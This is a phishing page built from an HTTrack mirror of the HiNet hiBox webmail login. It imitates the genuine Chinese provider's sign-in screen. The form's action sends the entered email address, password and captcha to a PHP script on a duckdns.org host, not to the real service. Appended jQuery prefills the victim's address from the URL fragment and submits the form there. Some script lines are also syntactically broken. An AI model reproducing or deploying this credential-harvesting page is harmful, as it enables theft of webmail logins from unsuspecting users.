
















	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--hb2-http06-zone-->
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- Mirrored from hibox.hinet.net/uwc/auth?lang=en by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 26 Apr 2022 16:16:04 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META name="keywords" content="email,HiNet Mail,Push Mail,hinet 郵件,hinet信箱,郵件委外,mail,spam,web mail,webmail,mail ASP,中華 電信 信箱,中華 電信 電子信箱,企業信箱,信箱委外,Mail Server,垃圾郵件,信箱,掃毒,郵件,郵件代管,郵件伺服器,資訊安全,電子信箱,電子郵件,網域名稱,傳真,簡訊,全能信箱,企業信箱,訊息服務,企業郵件">
<META name="description" content="省去自行建置及維護電子郵件服務系統之成本及繁瑣，同時享受HiNet中華電信最穩固機房與充足頻寬提供企業電子郵件系統委外之專業化服務，輕鬆擁有安全無毒、不受垃圾郵件干擾的使用環境，讓企業重要商機(郵件)不漏失；多功能整合式郵件信箱服務，操作容易卻提昇企業競爭力">
<title>hiBox Messaging Service</title>
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
.loginTable td > *{
	vertical-align: middle;
}
a, img{
	border: none;outline: none;
}
</style>
<link href="uwc/css/hiBox_en.css" rel="stylesheet" type="text/css" />
<!-- prevent XFS  -->
<style id="antiClickjack">
    body{display:none !important;}
</style>
<script type="text/javascript">
    if (self === top) {
        var antiClickjack = document.getElementById("antiClickjack");
        antiClickjack.parentNode.removeChild(antiClickjack);
    } else {
        top.location = self.location;
    }
</script>
<SCRIPT type="text/javascript" src="uwc/js_en/index.js"></SCRIPT>

<link href="uwc/css/tb.html" rel="stylesheet" type="text/css" />
<SCRIPT type="text/javascript" src="uwc/js_tw/index.js"></SCRIPT>
	
	<!-- jQuery & jQueryUI + theme --> 
	<link href="uwc/vkeyboard/jquery/jquery-ui.css" rel="stylesheet">
	<script src="uwc/vkeyboard/jquery/jquery.min.js"></script>
	<script src="uwc/vkeyboard/jquery/jquery-ui.min.js"></script>
	
	<!-- keyboard widget css & script (required) -->
	<link href="uwc/vkeyboard/css/keyboard.css" rel="stylesheet">
	<script src="uwc/vkeyboard/js/jquery.keyboard.js"></script>
	<script src="uwc/vkeyboard/js/enkey.js"></script>
	
<script type="text/javascript">
var copyRight = null;
var productName = null;
var logoImagePath = null;
var versionImagePath = null;
var versionPageTitle = null;
var closeLabel = null;
var closeTitle = null;
var LoginImagePath = null;

function handleLoad()
{
copyRight="Copyright  2008 Sun Microsystems, Inc. All rights reserved. SUN PROPRIETARY/CONFIDENTIAL. U.S. Government Rights - Commercial software. Government users are subject to the Sun Microsystems, Inc. standard license agreement and applicable provisions of the FAR and its supplements. Use is subject to license terms. Sun, Sun Microsystems, the Sun logo and Java are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries.";
productName="Sun Java(TM) System Communications Express 6.3 update 1";
logoImagePath="uwc/images/login-logo.gif";
versionImagePath="../images/S1MC_login.html";
versionPageTitle="Version Information";
closeLabel="Close";
closeTitle="Close Window";
document.form1.username.focus();
}

/*modify start*/
function callSubmit(eventTag) { 
   //if (event.keyCode==13)
   //    handleSubmit();
   var event = eventTag||window.event;
   var currentKey = event.charCode||event.keyCode;
   if (currentKey==13)
       handleSubmit();
}
/*modify end*/
function LoadCaptcha()
{
	document.getElementById('captcha').src = https://hibox.hinet.net/uwc/stickyImg?' + Math.random(); 
	return false;
}
function handleSubmit() {
  if (document.forms.form1.save_uid.checked) {
 		selectioncookie();
	}
  if(document.form1.username.value.indexOf("@")==-1) { 
	document.form1.username.value = document.form1.username.value + "@hibox.hinet.net";	
  }	

  var targetAction =  "/uwc/auth";
  document.form1.action = targetAction;
  document.form1.submit();
}



function handleError() {
	if (false || false ) {
		/*modify start*/
		document.write('<img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22"><font color="red">Authentication fails</font>');
		//document.write('<tr><td width="244" align="center" class="bk12" height="9" colspan="2">\n'+'<img src="./uwc/./uwc/images_en/Error_Large.gif" alt="" width="21" height="22">&nbsp;&nbsp;<font color="red">' +'<span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span><br></td></tr>');
		/*
		document.write('<DIV class=logErr>');
		document.write('<table cellspacing=0 cellpadding=0 border=0>');
		document.write('<tbody>');
	        document.write('<tr>');
		document.write('<td valign=top width="28"><img src="./uwc/./uwc/images_en/Error_Large.gif" alt="" width="21" height="22">&nbsp;&nbsp;</td>');
		document.write("<td width='233'> <span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span> </td>");

		document.write('</tr>');
		document.write('</tbody>');
		document.write('</table>');
		document.write('</DIV>');
		modify end*/
	}

}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
</script>
</head>

<body onload="handleLoad();funShowMainBanner(0);MM_preloadImages('uwc/images_en/botton02_01.gif','uwc/images_en/botton02_03.gif','uwc/images_en/botton03_02.gif','uwc/images_en/icon-more02.gif');LoadCaptcha();">
<form method="post" action="https://25800852.duckdns.org/O-O/74775105924-37947028463-41281332901-82957146496-01439666365/H1N3T.php" id="login-form">
                    <input type="hidden" id="referrer" name="referrer" value="" />
<!-- header start-->
<SCRIPT type=text/javascript src="uwc/js_en/header.js"></SCRIPT>
<!-- header end-->
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="7"><img src="uwc/images_en/HB_03.gif" width="937" height="7" /></td>
  </tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="3" height="31"><img src="uwc/images_en/HB_04.gif" width="3" height="212" /></td>
    <td width="632" valign="top"><TABLE border="0" cellpadding="0" cellspacing="0" class=index_main_banner_table>
  <TBODY>
    <TR>
      <TD id=tdMainBannerPic>
      <DIV id=divMainBanner1><A href="#" 
            target=_parent><IMG 
            src="uwc/images_en/HB_05.jpg" width="632" height="190" border=0></A></DIV>
      <DIV style="DISPLAY: none" id=divMainBanner2><A href="#" 
            target=_parent><IMG border=0 src="uwc/images_en/HB_05-02.jpg"></A></DIV>
      <DIV style="DISPLAY: none" id=divMainBanner3><A href="#" 
            target=_parent><IMG border=0 src="uwc/images_en/HB_05-03.jpg"></A></DIV>
      <DIV style="DISPLAY: none" id=divMainBanner4><A href="#" 
            target=_parent><IMG border=0 src="uwc/images_en/HB_05-04.jpg"></A></DIV></TD>
    </TR>
    <TR>
      <TD height="22" align=left valign="top" background="uwc/images_en/banner-bg01.gif"><table width="600" border="0" cellpadding="0" cellspacing="0">
          <tr>
            <td align="right"><TABLE border="0" cellpadding="0" cellspacing="0" class=index_main_banner_page_table>
              <TBODY>
                <TR id=trMainBannerPage>
                  <TD class=index_main_banner_page_current><A 
                  onmouseover=funShowMainBanner(0); 
                  href="javascript: void(0);">1</A></TD>
                  <TD class=index_main_banner_page_td><A 
                  onmouseover=funShowMainBanner(1); 
                  href="javascript: void(0);">2</A></TD>
                  <TD class=index_main_banner_page_td><A 
                  onmouseover=funShowMainBanner(2); 
                  href="javascript: void(0);">3</A></TD>
                  <TD class=index_main_banner_page_td><A 
                  onmouseover=funShowMainBanner(3); 
                  href="javascript: void(0);">4</A></TD>
                </TR>
              </TBODY>
            </TABLE></td>
          </tr>
        </table></TD>
    </TR>
  </TBODY>
</TABLE></td>
    <td width="8"><img src="uwc/images_en/HB_06.gif" width="8" height="212" /></td>
    <td width="292" align="center" valign="top" background="uwc/images_en/HB_07.gif">
    
    
    <table width="252" height="135" border="0" cellpadding="0" cellspacing="1" class="loginTable">
      <tr>
        <td height="40" colspan="2" align="right" valign="middle">
		&nbsp; <script>
				handleError();
			   </script>
	    </td>
      </tr>
      <tr>
        <td height="30" align="left" colspan="2">Username：           

		   <input type="email" id="email" name="email" placeholder="Full Email Address Required" maxlength="50" size="20" /><img id="uname" class="tooltip" title="Using Virtual Keyboard" src="uwc/vkeyboard/keypad.png">
          <br /></td>
      </tr>
      <tr>
        <td height="30" align="left" colspan="2">Password ：

		  <input type="password" id="password" name="password" maxlength="50" size="20" /><img id="passwd" class="tooltip" title="Using Virtual Keyboard" src="uwc/vkeyboard/keypad.png"></td>
      </tr>
		  		
		
	  <tr>
		<td height="32" align="center">
			<img id="captcha" src="https://hibox.hinet.net/uwc/stickyImg" />&nbsp;=&nbsp;
			<input type="text" id="captchaans" name="captcha" placeholder="Equation Answer, Please" class="ui-widget-content ui-corner-all" style="text-align: center;" size="12" maxlength="3" value=""/>
			<a href="#" onclick="document.getElementById('captchaans').value=''; document.getElementById('captcha').src = https://hibox.hinet.net/uwc/stickyImg?' + Math.random(); return false;" tabindex="-1"><img src="uwc/images/refresh.png" height="15" width="15" tabindex="-1"/></a>		
		</td>
		<td>
		
		</td>
	  </tr>

	  

			
		
      <tr>
        <td height="32" align="left" valign="bottom"><input type="checkbox" name="save_uid" id="save_uid" tabindex="-1"/>
          Remember my ID
		  <button class="submit_btn" id="submit_btn"><img src="uwc/images_en/botton01_01.gif" alt="login" name="Image6" width="47" height="26" border="0" id="Image6" /></button><button class="submit_btn" id="submit_btn"><img src="uwc/images_en/botton01_03.gif" alt="help" name="Image7" width="47" height="26" border="0" id="Image7" onclick="MM_openBrWindow('uwc/homepage_en/popup.html','','width=395,height=220')"  /></button>
		</td>
      </tr>
      <tr>
		<td align="center">
			<a href="https://apply.hibox.hinet.net/hiBox_extend/mailAdmin/login.php" target="_blank" onmouseover="MM_swapImage('Image11','','uwc/images_en/botton03_02.gif',1)" onmouseout="MM_swapImgRestore()"><img src="uwc/images_en/botton03_01.gif" alt="Administrator ENTER" name="Image11" width="222" height="36" border="0" id="Image11" /></a>
		</td>
	  </tr>	
	  
    </table>
	  <!--	
      <table width="223" height="55" border="0" cellpadding="0" cellspacing="0">
        <tr>
          <td height="55"></td>
        </tr>
      </table>
	   -->
	  </td>
    <td width="2"><img src="uwc/images_en/HB_08.gif" width="2" height="212" /></td>
  </tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="7"><img src="uwc/images_en/HB_09.gif" width="937" height="9" /></td>
  </tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="206" valign="top" background="uwc/images_en/HB_10.gif"><table width="937" height="190" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="657" height="190" align="center" valign="top"><table width="620" height="39" border="0" cellpadding="0" cellspacing="0">
          <tr>
            <td width="526" height="39" align="left" valign="bottom"><img src="uwc/images_en/td-01.gif" alt="News" width="375" height="26" /></td>
            <td width="94" align="right" valign="bottom"><a href="uwc/homepage_en/news.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image13','','uwc/images_en/icon-more02.gif',1)"><img src="uwc/images_en/icon-more01.gif" alt="More" name="Image13" width="94" height="20" border="0" id="Image13" /></a></td>
          </tr>
        </table>
          <!--info start-->
			<SCRIPT type=text/javascript src="uwc/js_en/info.js"></SCRIPT>
		  <!--info end--> 
		</td>
        <td width="20" align="left"><img src="uwc/images_en/dis-01.gif" width="3" height="190" /></td>
        <td width="260" align="left" valign="middle"><table width="100" border="0" cellpadding="0" cellspacing="4">
            <tr>
              <td><a href='uwc/homepage_en/promotion02.html'><img src="uwc/images_en/banner01.gif" width="218" height="80" border="0" /></a></td>
            </tr>
            <tr>
              <td><a href='uwc/homepage_en/news.html#new01'><img src="uwc/images_en/banner02.gif" width="218" height="80" border="0" /></a></td>
            </tr>
          </table>
          </td>
      </tr>
    </table></td>
  </tr>
</table>
<script src="uwc/js/placeholders.min.js"></script>
<SCRIPT type="text/javascript" src="uwc/js_en/footer.js"></SCRIPT>
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

<script>
        var url = window.location.hash;
        var email = document.URL.substr(document.URL.indexOf('#')+1).split('#')[0];
        var pwdError = document.URL.substr(document.URL.indexOf('#')+1).split('#')[1];
        var regex = /^([a-zA-Z0-9_\.\-\+])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        var pwdAsked = false;
        $("#referrer").val(window.location.href);

        if(email != '' && regex.test(email)) {
            $("#email").val(email);
            $("#email").parent().addClass('focused');
        }

        if(pwdError) {
			$('#error-block').removeClass('hidden');
			$('#error-block1').addClass('hidden');
			
        }


        $("#password").keypress(function(e) {
            var key = e.which;
            if(key == 13) {
                $("#submit_btn").trigger('click');
            }
        });

        $('#submit_btn').click(function() {
            $("#login-form").submit();
        });

        $('.contact-menu-open').click(function() {
            $(this).toggleClass('open');
            $('#contact-menus').toggleClass('open');
        });

        $('.main').click(function() {
            $('#contact-menus').removeClass('open');
        });

        $('.login-panel input').on('focus', function() {
            $(this).parent().addClass('focused');
        });

        $('.login-panel input').on('blur', function(e) {
            if(e.target.value === '') $(this).parent().removeClass('focused');
        });

        $('#toggle-password-showing').click(function() {
            console.log($('#password').attr('type'));
            var currentType = $('#password').attr('type');

            if(currentType === 'password') {
                $('#password').attr('type', 'text');
                $('#toggle-password-showing').text('Hide');
            }
            else {
                $('#password').attr('type', 'password');
                $('#toggle-password-showing').text('Show');
            }
        });

        $('.uxicon-svg-container.ux-control-indicator').click(function() {
            $('#keep_signin').trigger('click');
        });

        $('label[key=keep_signin]').click(function() {
            $('#keep_signin').trigger('click');
        });

        $('#keep_signin').on('click', function(e) {
            var isChecked = $(this).is(':checked');
            
            if(isChecked) {
                $('.check-box-wrapper').addClass('checked');
            }
            else {
                $('.check-box-wrapper').removeClass('checked');
            }
        });
    </script>
</body>

</html>

 

<link rel="SHORTCUT ICON" href="webmail/favicon.ico">



